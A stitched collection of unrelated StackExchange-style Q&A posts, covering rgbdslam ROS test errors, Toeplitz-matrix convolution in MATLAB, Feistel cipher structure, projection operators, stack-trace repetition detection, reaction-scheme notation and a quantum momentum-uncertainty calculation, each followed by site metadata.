mv: cannot stat ‘rgbd_dataset_freiburg1_xyz.bag?’: No such file or directory
cp: cannot stat ‘rgbd_dataset_freiburg1_xyz-groundtruth.txt’: No such file or directory
cp: cannot stat ‘/test/test_settings.launch’: No such file or directory
[rospack] Error: package 'rgbdslam' not found
rgbd_dataset_freiburg1_desk ... No estimate at level 0
rgbd_dataset_freiburg1_xyz ... No estimate at level 0
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 0 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_0.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 1
rgbd_dataset_freiburg1_xyz ... No estimate at level 1
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 1 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_1.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 2
rgbd_dataset_freiburg1_xyz ... No estimate at level 2
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 2 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_2.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 3
rgbd_dataset_freiburg1_xyz ... No estimate at level 3
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 3 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_3.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
rgbd_dataset_freiburg1_desk ... No estimate at level 4
rgbd_dataset_freiburg1_xyz ... No estimate at level 4
paste: eval_translational.ate.txt: No such file or directory
ATE Results at Level 4 are stored in /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test/[rgbd_dataset_freiburg1_xyz.bag]/emm__0.00/CANDIDATES_4/RANSAC_100/OPT_SKIP_10/ORB/600_Features/maxate_evaluation_4.csv
600 Features "ATE MAX" "Duration" "Optimization Time" Nodes Edges
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigoclear
bash: /home/elizeu/rgbdslam_catkin_ws/src/rgbdslam_v2-indigoclear: No such file or directory
elizeu@elizeu:~/rgbdslam_catkin_ws/src/rgbdslam_v2-indigo/test$ clear
Originally posted by elizeu_jr on ROS Answers with karma: 11 on 2016-11-14
Post score: 0
Answer:
The first (and possibly only) problem is package 'rgbdslam' not found. This means that ROS does not know about the rgbdslam package. This problem has been asked before.
If you have rgbdslam in a catkin workspace somewhere, make sure you have built it (with catkin_make install) and sourced it (with source path/to/workspace/devel/setup.bash).
If that error goes away and it still doesn't work, the bag/ground truth files may be in the wrong place. The error should tell you somewhere!
Originally posted by petern3 with karma: 186 on 2016-11-23
This answer was ACCEPTED on the original site
Post score: 0 | {
"domain": "robotics.stackexchange",
"id": 26249,
"tags": "ros, rgbdslam-v2, rgbd"
} |
linear convolution toeplitz matrix vs circular convolution toeplitz matrix | Question: I have an issue in understanding the difference between building the Toeplitz matrix when the convolution is linear and when it's circular. As I know that Toeplitz matrix $H$ can be built as following
H = toeplitz(h;zeros(N-L,1),h(1), zeros(1,N-1));
where h is the channel and L is the length of the channel, and N is the total length of symbol convoluted with the channel.
My question, if the convolution with the channel is circular, will the Toeplitz matrix still be built in the same way?
Answer: They are in general different. For two signals of lengths $N$ and $M$, linear and circular convolution are equivalent if the output is specified to be of length $N + M - 1$ with the appropriate padding. Convolution via the DFT is inherently circular, which is why padding must be done before the inverse DFT to yield the linear convolution. So, this is a special case where they are the same.
If your goal is to always yield linear convolution, then don't worry about forming a circular Toeplitz matrix since the result will be the same when using the regular Toeplitz and is simpler to do so.
Below is some sample code and output where we form regular and circular Toeplitz matrices with a specified output of length $N + M - 1$:
%% Toeplitz Convolution
x = [1 8 3 2 5];
h = [3 4 1];
% Form the row and column vectors for the Toeplitz matrix
r = [h zeros(1, length(x) - 1)];
c = [h(1) zeros(1, length(x) - 1)];
% Toeplitz matrix
hConv = toeplitz(c,r)
% Compare the two types of convolutions
y1 = x*hConv
y2 = conv(x, h)
hConv =
3 4 1 0 0 0 0
0 3 4 1 0 0 0
0 0 3 4 1 0 0
0 0 0 3 4 1 0
0 0 0 0 3 4 1
y1 =
3 28 42 26 26 22 5
y2 =
3 28 42 26 26 22 5
%% Toeplitz Circular Convolution
% Convolution length
n = length(x) + length(h) - 1;
numElementDiff = n - length(h);
% Set up the circular Toeplitz matrix
c = [h(1) fliplr([h(2:end) zeros(1, numElementDiff)])];
hConvCirc = toeplitz(c, [h zeros(1, numElementDiff)])
% Compare the two types of convolutions
y1 = [x zeros(1, length(c) - length(x))]*hConvCirc
y2 = cconv(x, h, n)
hConvCirc =
3 4 1 0 0 0 0
0 3 4 1 0 0 0
0 0 3 4 1 0 0
0 0 0 3 4 1 0
0 0 0 0 3 4 1
1 0 0 0 0 3 4
4 1 0 0 0 0 3
y1 =
3 28 42 26 26 22 5
y2 =
3.0000 28.0000 42.0000 26.0000 26.0000 22.0000 5.0000
Here we're testing three things:
Linear convolution conv() is equivalent to performing the matrix multiplication with the appropriate Toeplitz matrix.
Circular convolution cconv() is equivalent to performing the matrix multiplication with the appropriate circular Toeplitz matrix.
Output length is specified as $N + M - 1$, so we see that linear and circular convolution are equivalent.
If you are going to perform circular convolution of varying sizes, then you must form the Toeplitz matrix differently. This usually involves some type of padding with the matrix entries themselves or the signal(s) being operated on. Mathworks has a good summary of Toeplitz matrices here and linear vs circular convolution here. | {
"domain": "dsp.stackexchange",
"id": 9413,
"tags": "matlab, digital-communications, convolution, matrix"
} |
Why does Feistel encryption algorithm encode half block every time? | Question: Why does Feistel encryption algorithm encode half block every time? What would happen if the entire block is encrypted in each step?
Answer: You can't. Some of the block is used as the input to the F function, and the rest is modified. Those can't overlap. If you wanted to modify all of the block, there wouldn't be any input to the F function.
You might be interested in https://en.wikipedia.org/wiki/Feistel_cipher#Unbalanced_Feistel_cipher | {
"domain": "cs.stackexchange",
"id": 13899,
"tags": "cryptography, encryption"
} |
Binary Search Tree (BST) Implementation | Question: This is the first Time implementing a Binary Search Tree, based on how it works from the visualgo website. I made this algorithm purely based on what I saw, and the remove method was quite challenging. How can I improve the speed/efficiency and make the code look better?
Methods:
Inorder: basically an inorder traversal through the BST Ex: 1 3 4 6 19 25
Insert: inserts a node with a certain value
lookup: returns the value if it exists in the BST else returns None
getMin: returns the min value in the specified node
remove: removes a value, and if current_node is not specified then, it starts from the root node, a bit recursive, even though I wanted to implement a way without recursion, but I couldn't see it working without it in any way.
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
class BinarySearchTree:
def __init__(self):
self.root = None
def inorder(self, current_node):
if current_node:
self.inorder(current_node.left)
print(current_node.value, end=' ')
self.inorder(current_node.right)
def insert(self, value):
NewNode = Node(value)
current_node = self.root
if current_node is None:
self.root = NewNode
else:
while True:
if value < current_node.value:
#Left
if not current_node.left:
current_node.left = NewNode
return self
current_node = current_node.left
else:
if not current_node.right:
current_node.right = NewNode
return self
current_node = current_node.right
def lookup(self, value):
current_node = self.root
if current_node is None:
return None
while current_node:
current_value = current_node.value
if value < current_value:
current_node = current_node.left
elif value > current_value:
current_node = current_node.right
else:
return current_node
def getMin(self, current_node):
while current_node.left is not None:
current_node = current_node.left
return current_node.value
def remove(self, value, current_node=False):
if not current_node:
current_node = self.root
if not current_node: # if the root is None
return None
parent_node = None
while current_node:
current_value = current_node.value
if value < current_value:
parent_node = current_node
current_node = current_node.left
elif value > current_value:
parent_node = current_node
current_node = current_node.right
else:
# No Child
if not current_node.left and not current_node.right:
if parent_node is None:
self.root = None
elif current_node == parent_node.left:
parent_node.left = None
else:
parent_node.right = None
# One Child
elif current_node.right and not current_node.left:
if parent_node is None:
self.root = current_node.right
elif current_node == parent_node.left:
parent_node.left = current_node.right
else:
parent_node.right = current_node.right
elif current_node.left and not current_node.right:
if parent_node is None:
self.root = current_node.left
elif current_node == parent_node.left:
parent_node.left = current_node.left
else:
parent_node.right = current_node.left
# Two Child
else:
in_order_successor = self.getMin(current_node.right)
self.remove(in_order_successor, current_node)
if parent_node is None:
self.root.value = in_order_successor
elif current_node == parent_node.left:
parent_node.left.value = in_order_successor
else:
parent_node.right.value = in_order_successor
return True # if removed
return False # if value doesnt exist
Answer:
How can I…make the code look better?
Follow the Style Guide for Python Code.
Add docstrings, at least for "everything to be used externally".
Add (doc)tests. Or, at least, a start for tinkering:
if __name__ == "__main__":
t = BinarySearchTree()
for c in "badcef":
t.insert(c)
t.remove("d")
provide amenities like an __str__ for node
def is_leaf(self):
return self.left is None and self.right is None
def __str__(self):
return "(" + (self.value if self.is_leaf() else (
(str(self.left.value + "<") if self.left else "^")
+ self.value
+ ("<" + str(self.right.value) if self.right else "^"))) + ")"
(It is somewhat rare that I don't provide docstrings. It felt right here.)
Keep classes and functions short.
Say, 24 lines for "heads", 48 for a function body, 96 for a class.
Where not impeding readability, keep nesting level low.
This includes early outs, continues, breaks & else in loops; returns
def insert(self, value):
""" Insert value into this tree.
ToDo: document behaviour with identical keys
(what about lookup()?)
"""
latest = Node(value)
current = self.root
previous = None # the parent for latest, if any
left = None # the child latest is going to be in parent
while current is not None:
previous = current
left = value < current.value
current = current.left if left else current.right
if previous is None:
self.root = latest
elif left:
previous.left = latest
else:
previous.right = latest
return self
(what an awful example for changing entirely too many things at once)
Python naming style is CapWords for classes, only: that would be new_node.
The left = None statement is there for the comment.
The paranoid prefer is None/is not None over just using what should be a reference in a boolean context.
Above rendition tries to keep DRY and avoids some of what looks repetitious in the insert() you presented.
But, wait, doesn't that descend left or right thing look just the same in lookup() and remove()?
If I had a method
def _find(self, value):
""" Find node with value, if any.
Return this node and setter for (re-)placing it in this tree.
"""
pass
, insert() was simple, and lookup() trivial (if questionable: wording
• lookup: returns the value if it exists in the BST else returns None
, implementation returns a Node):
def insert(self, value):
""" Insert value into this tree.
ToDo: document behaviour with identical keys
"""
existing, place = self._find(value)
if existing is not None:
pass
place(Node(value))
return self
def lookup(self, value):
""" Return node with value, if any. """
return self._find(value)[0]
Remove can profit from a modified successor method
@staticmethod
def leftmost(child, parent=None):
""" Return the leftmost node of the tree rooted at child,
and its parent, if any. """
if child is not None:
while child.left is not None:
child, parent = child.left, child
return child, parent
def deleted(self, node): # node None?
""" Return root of a tree with node's value deleted. """
successor, parent = BinarySearchTree.leftmost(node.right, node)
if successor is None:
return node.left
node.value = successor.value
if node is not parent:
parent.left = successor.right
else:
node.right = successor.right
return node
def remove(self, value):
""" Remove value.
Return 'tree contained value'. """
node, place = self._find(value)
if node is None:
return False
place(self.deleted(node))
return True
My current rendition of _find() adds in Node
def _set_left(self, v):
self.left = v
def _set_right(self, v):
self.right = v
, in BinarySearchTree
def _set_root(self, v):
self.root = v
def _find(self, value):
""" Find node with value, if any.
Return this node and setter for (re-)placing it in this tree.
"""
if self.root is None or self.root.value == value:
return self.root, self._set_root
child = self.root
while True:
node = child
smaller = value < child.value
child = child.left if smaller else child.right
if child is None or child.value == value:
return child, node._set_left if smaller else node._set_right
How can I improve the speed/efficiency?
Don't spend effort there before measurements suggesting it's a bottleneck.
Guide-line for easy-to-use types: Don't make me think.
You define inorder() to print the values in order.
Wouldn't it be cute to be able to use, for a tree ascending
for item in ascending: …? While it was possible to not touch Node, add
def __iter__(self):
""" Yield each node in the tree rooted here in order. """
if self.left is not None:
yield from self.left
yield self.value
if self.right is not None:
yield from self.right
there, and in the tree
def __iter__(self):
""" Yield each node in the tree in order. """
if self.root is not None:
yield from self.root
, enabling print(*ascending) | {
"domain": "codereview.stackexchange",
"id": 42323,
"tags": "python, python-3.x, linked-list, binary-search-tree"
} |
Show that $\lambda |\phi^+\rangle \langle\phi^+| + (1-\lambda )|\phi^-\rangle \langle\phi^-|$ is the Choi–Jamiołkowski matrix of a quantum channel | Question: I'm curious how to show how this matrix:
$$c = \lambda |\phi^+\rangle \langle\phi^+| + (1-\lambda )|\phi^-\rangle \langle\phi^-|$$
is the Choi–Jamiołkowski matrix of a quantum channel for any $\lambda \in [0,1]$
Answer: I'll use notation inspired from Watrous' book. Let $\Phi:\mathrm{Lin}(\mathcal X)\to\mathrm{Lin}(\mathcal Y)$ be a quantum channel (i.e. a CPTP map).
Define its Choi representation as the operator $J(\Phi)\in\mathrm{Lin}(\mathcal Y\otimes\mathcal X)$ defined by
$$J(\Phi) = \sum_{ij} \Phi(E_{ij})\otimes E_{ij},\qquad E_{ij}\equiv |i\rangle\!\langle j|.$$
Then you can verify that $J(\Phi)\ge0$ and $\operatorname{Tr}_{\mathcal Y}(J(\Phi))=I_{\mathcal X}$.
Vice versa, let $A\in\mathrm{Lin}(\mathcal Y\otimes\mathcal X)$ be a positive semidefinite linear operator such that $\operatorname{Tr}_{\mathcal Y}(A)=I_{\mathcal X}$, and define the linear map $\Phi_A\in\mathrm{Lin}(\mathrm{Lin}(\mathcal X),\mathrm{Lin}(\mathcal Y))$ via
$$\Phi_A(E_{j\ell}) \equiv \sum_{ik} \langle i,j|A|k,\ell\rangle E_{ik},
\qquad \Phi_A(X) = \operatorname{Tr}_{\mathcal X}[A(I\otimes X^T)].$$
You can then verify that $\Phi_A$ is CPTP.
Moreover, the two operations are one the inverse of the other: $\Phi_{J(\Phi)}=\Phi$.
In conclusion, a linear operator $A\in\mathrm{Lin}(\mathcal Y\otimes\mathcal X)$ is the Choi of a CPTP map iff it is positive semidefinite and satisfies the trace property.
In this case, verifying the positivity is immediate. Moreover, assuming $|\phi^\pm\rangle$ here denote maximally entangled states, the partial trace gives the identity for both terms, and thus the other condition is also trivially verified for all $\lambda\in[0,1]$.
I should note that in the definition I'm using here of "Choi representation" isn't a state, in that it's not normalised: $\mathrm{Tr}(J(\Phi))=\operatorname{dim}(\mathcal X)$. This is however trivially fixed by adding the appropriate normalisation factor in the definition. | {
"domain": "quantumcomputing.stackexchange",
"id": 2511,
"tags": "textbook-and-exercises, quantum-operation"
} |
Algorithm to identify contiguous repeated series of lines in a long string | Question: I would like an algorithm that can identify repeated parts of big stack traces like this:
java.lang.StackOverflowError
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
With a bit of inspection, it's clear that this segment is being repeated three times:
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
The end goal is so I can print out stack traces of recursive functions in a nicer fashion
java.lang.StackOverflowError
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
------------------------- Repeated 3x -------------------------
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
at typechecker.Typers$Typer.silent(Typers.scala:700)
at typechecker.Typers$Typer.normalTypedApply$1(Typers.scala:4754)
at typechecker.Typers$Typer.typedApply$1(Typers.scala:4801)
at typechecker.Typers$Typer.typedInAnyMode$1(Typers.scala:5586)
at typechecker.Typers$Typer.typed1(Typers.scala:5603)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
-------------------------------------------------------------
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
I'm not sure how feasible this is, but I'd be happy for any and all possible solutions even if they have their own limitations and constraints. Preliminary Googling didn't find me anything, but quite likely I just don't know what to google
Answer: Under normal circumstances, JVM fills only the last 1024 calls in a stacktrace, and in Dotty/Scalac most stackoverflows have a repeating fragment of length ≈ 70 or less. A stacktrace T of a StackOverflowException can be decomposed into three parts S · R^N · P, where R is the repeating part of the stacktrace, S is some suffix of R, and P is either some prefix of R or an unrelated sequence of calls. We are interested in a solution such that the total length C = |S · R^N| of the repeating part and N are both maximal, and |S| is minimal.
// Scala Pseudocode (beware of for comprehensions)
//
// Stack is assumed to be in reverse order,
// most recent stack frame is last.
val stack: Array[StackTraceElement]
val F: Int // Maximum size of R.
val candidates = for {
// Enumerate all possible suffixes S.
S <- ∀ prefix of stack
if |S| < F
// Remove the suffix from the stack,
R <- ∀ non-empty prefix of stack.drop(|S|)
// Find a fragment that ends with S.
if R.endsWith(S)
// Find out how many fragments fit into the stack.
// (how many times we can remove R from the stack)
N = coverSize(R, stack.drop(|S|))
if N >= 2 // Or higher.
} yield (S, R, N)
// Best cover has maximum coverage,
// minimum fragment length,
// and minimum suffix length.
val bestCandidate = candidates.maxBy { (S, R, N) =>
val C = |S| + |R| * N
return (C, -|R|, -|S|)
}
The entire algorithm can be implemented in a way that does not allocate any memory (to handle OOM). It has complexity O(F^2 |T|), but exceptions are rare enough and this is a small constant (F << 1024, T = 1024).
I have implemented this exact algorithm in my library https://github.com/hobwekiva/tracehash (https://github.com/hobwekiva/tracehash/blob/master/src/main/java/tracehash/internal/SOCoverSolver.java) for the same purpose of simplifying scalac/dotc errors ;)
EDIT: Here is an implementation of the same algorithm in Python:
stack = list(reversed([3, 4, 2, 1, 2, 1, 2, 1, 2, 1, 2]))
F = 6
results = []
for slen in range(0, F + 1):
suffix, stack1 = stack[:slen], stack[slen:]
for flen in range(1, F + 1):
fragment = stack1[:flen]
if fragment[flen - slen:] != suffix:
continue
stack2 = stack1[:]
n = 0
while stack2[:flen] == fragment:
stack2 = stack2[flen:]
n += 1
if n >= 2: # A heuristic, might want to set it a bit higher.
results.append((slen, flen, n))
def cost(t):
s, r, n = t
c = s + r * n
return (c, -r, -s)
S, R, N = max(results, key=cost)
print('%s · %s^%d · %s' % (stack[:S], stack[S:S+R], N, stack[S+R*N:]))
# Prints [] · [2, 1]^4 · [2, 4, 3]
EDIT2: Following some of the ideas from mukel's answer, here is a function https://gist.github.com/hobwekiva/b041099eb5347d728e2dacd1e8caed8c that solves something along the lines of:
stack = a[1]^k[1] · a[2]^k[2] · ...
argmax (sum |a[i]| * k[i] where k[i] >= 2,
-sum |a[i]| where k[i] >= 2,
-sum |a[i]| where k[i] == 1)
It is greedy so it is not necessarily an optimal solution, but it seems to work reasonably well in simple cases, e.g. given
stack = list(reversed([
3, 4, 2,
1, 2, 1, 2, 1, 2, 1, 2,
5,
4, 5, 4, 5, 4, 5,
3, 3, 3, 3]))
it produces an answer
[([3], 4), ([5, 4], 3), ([5], 1), ([2, 1], 4), ([2, 4, 3], 1)] | {
"domain": "cs.stackexchange",
"id": 12975,
"tags": "algorithms, strings, substrings"
} |
When writing out synthetic reaction schemes, why are some reactions combined in one arrow? | Question: An example of what I mean is here in the synthesis of compound 13. The reaction of the first arrow describes a single reaction, whereas the second arrow to form the final compound seems to have five stages combined into one. I understand that the compound is carried on as is without characterization when the parts are combined into a single step.
If one were designing a new synthesis, what factors would lead one to write (and characterize) each step of the synthesis versus combining many individual reactions in one apparent step?
P. S. This is not an organic chemistry question per se, but meta-ochem (sorry if my tags are limited in description).
Answer: I want to start off by saying that your example is a particularly bad one. Usually, the arrows in a scheme should at least state a list of reagents and steps. Instead, I would love to discuss this using scheme 7 of Zhang et al.’s Beilstein J. Org. Chem. article.[1] (Beilstein J. Org. Chem. is a open access journal, the full text should be accessible from the DOI link provided below.)
The main reason for combining reactions like this is brevity. For example, every practicing chemist will immediately understand that the homoallyl Grignard under 1. will attack one of the carbonyl functions, that triethylsilane will reduce an oxygen and that TBAF will remove the silyl protecting group on the hydroxy function. None of these steps really warrant any discussion and most people would be able to draw out the missing structures in a few minutes. Likewise, I am not entirely sure why they did not include the preceeding protection into that same reaction scheme because there too there is noting interesting going on.
In more advanced synthetic schemes, the steps that are shortened and written together on a single arrow are often typical name reactions or very easily performed ones:
protections and deprotections
oxidations of alcohols to aldehydes with standard reagents
reductions with DIBAL, LAH or $\ce{NaBH4}$
ozonolyses
double bond isomerisations
simple Wittig/HWE reactions
etc.
They are typically chosen in such a way that the path is obvious and that the structure on the end of the arrow can be drawn up quickly by going through the steps. They will practically never include key steps or steps whose stereochemical outcome is uncommon. Cross-couplings of more elaborate structures or lesser known name reactions are also less common.
However, there is no rule as to what can be combined and what cannot. If anything, the reviewers might mark a scheme as too elaborate (i.e. can be shortened) or too brief (needs elaboration).
Reference:
[1]: J. Zhang, H.-K. Zhang, P.-Q. Huang, Beilstein J. Org. Chem. 2013, 9, 2358–2366. DOI: 10.3762/bjoc.9.271. | {
"domain": "chemistry.stackexchange",
"id": 8935,
"tags": "organic-chemistry, synthesis, notation"
} |
What is the standard definition of "projector", "projection" and "projection operator"? | Question: What is the precise meaning of "projector", "projection" and "projection operator"? I always thougth those two terms are synonyms, but I have seen both used in a quantum optics paper where the former is not the same as the latter. There the projector was defined as $(I_S|0)$ and the projection operator as
$\begin{pmatrix}
I_S & 0\\
0 & 0 \\
\end{pmatrix}$
with $I_S$ being the identity for a subspace $S$. So the first is a block-vector and the second a block-matrix? I have never seen such a distinction before and could not find any material about that online.
Answer: Usually, people will use all of these words interchangeably, to mean what your source calls a "projection operator". As for what your source means, note that
a linear transformation is a linear map $T: V \to W$ for vector spaces $V$, $W$
a linear operator is a linear map $T: V \to V$ for a vector space $V$
We are always working with linear transformations, but sometimes one may specify a transformation is an operator to emphasize that the input and output space are the same.
A projection can be thought of in either way. Suppose that the projection maps vectors in $V$ to a subspace $W$ of $V$. Then we can think of it as a linear transformation $T: V \to W$ where $W$ is regarded as a vector space of its own (what your source calls a projector, represented by a non-square matrix), or we can think of it as a linear operator $T: V \to V$ where the image happens to be $W \subset V$ (which your source calls a projection operator). Making such a distinction might be useful if you want to be very explicit about what the spaces are, but it's not standard. | {
"domain": "physics.stackexchange",
"id": 47661,
"tags": "quantum-mechanics, operators, quantum-information, definition, linear-algebra"
} |
Calculation of $\langle p\rangle$ and $\langle p^2\rangle$ for wave function | Question:
Given the wave function $$\psi(x)=A\exp\left[-a
\left(\frac{mx^{2}}{\hbar}+it\right)\right]$$ I would like to calculate $\sigma_{p}$.
\begin{align}\langle p\rangle &=\int \psi^{\star}\left(\frac{\hbar}{i}\frac{\partial}{\partial x}\right)\psi dx\\
&=2imaA^{2}\int xe^{-kx^{2}}dx\\
&=0
\end{align}
since the integrand is odd. (I let $k=\frac{2am}{\hbar}$)
Similarly,
\begin{align}
\langle p^2\rangle &=\int \psi^{\star}\left(\frac{\hbar}{i}\frac{\partial}{\partial x}\right)^{2}\psi dx\\
&=-2A^{2}ma\hbar \left[\int kx^{2}e^{-kx^{2}}dx-\int e^{-kx^{2}}dx\right]\\
&=-2A^{2}ma\hbar\left[\frac{1}{2} \sqrt{\frac{\pi}{k}}-\frac{1}{2} \sqrt{\frac{\pi}{k}}\right]\\
&=0 \end{align}
But doesn't this imply $\sigma_{p}=\sqrt{\langle \widehat p^{2}\rangle -\langle \widehat p\rangle ^{2}}=0$ ?
I think that I must have made a mathematical error, because this result as it stands would violate the uncertainty principle as I understand it: $\sigma_{x}\sigma_{p}\geq\frac{\hbar}{2}$
But I don't see anything incorrect. Does $\sigma_{p}=0$ violate the uncertainty principle?
Answer: There is an error in my calculation.
In fact: $\int ^{\infty}_{-\infty} e^{-kx^{2}}dx = \sqrt{\dfrac{\pi}{k}}$
So $$\langle \widehat p^{2} \rangle=-2A^{2}ma\hbar [\frac{-1}{2}\sqrt{\frac{\pi}{k}}]=ma\hbar$$ given that $A^{2}=\sqrt{\frac{2am}{\pi\hbar}}$ as calculated using the normalization condition.
